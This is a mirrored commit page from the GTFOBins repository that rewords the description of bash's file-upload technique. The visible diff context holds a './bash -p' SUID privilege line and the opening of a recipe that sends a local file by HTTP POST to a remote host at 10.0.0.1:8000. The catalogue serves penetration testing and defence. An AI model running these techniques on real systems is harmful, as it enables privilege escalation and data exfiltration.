mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-26 06:49:44 +01:00
Rephrase bash
This commit is contained in:
parent
e3d9c03c96
commit
d9612ec461
@ -7,7 +7,7 @@ functions:
|
|||||||
suid-enabled:
|
suid-enabled:
|
||||||
- code: ./bash -p
|
- code: ./bash -p
|
||||||
upload:
|
upload:
|
||||||
- description: Send local file in the body of an HTTP POST request. Run an HTTP service to collect the file from the other end.
|
- description: Send local file in the body of an HTTP POST request. Run an HTTP service to collect the file on the other end.
|
||||||
code: |
|
code: |
|
||||||
RHOST=10.0.0.1
|
RHOST=10.0.0.1
|
||||||
RPORT=8000
|
RPORT=8000
|
||||||
|
Loading…
Reference in New Issue
Block a user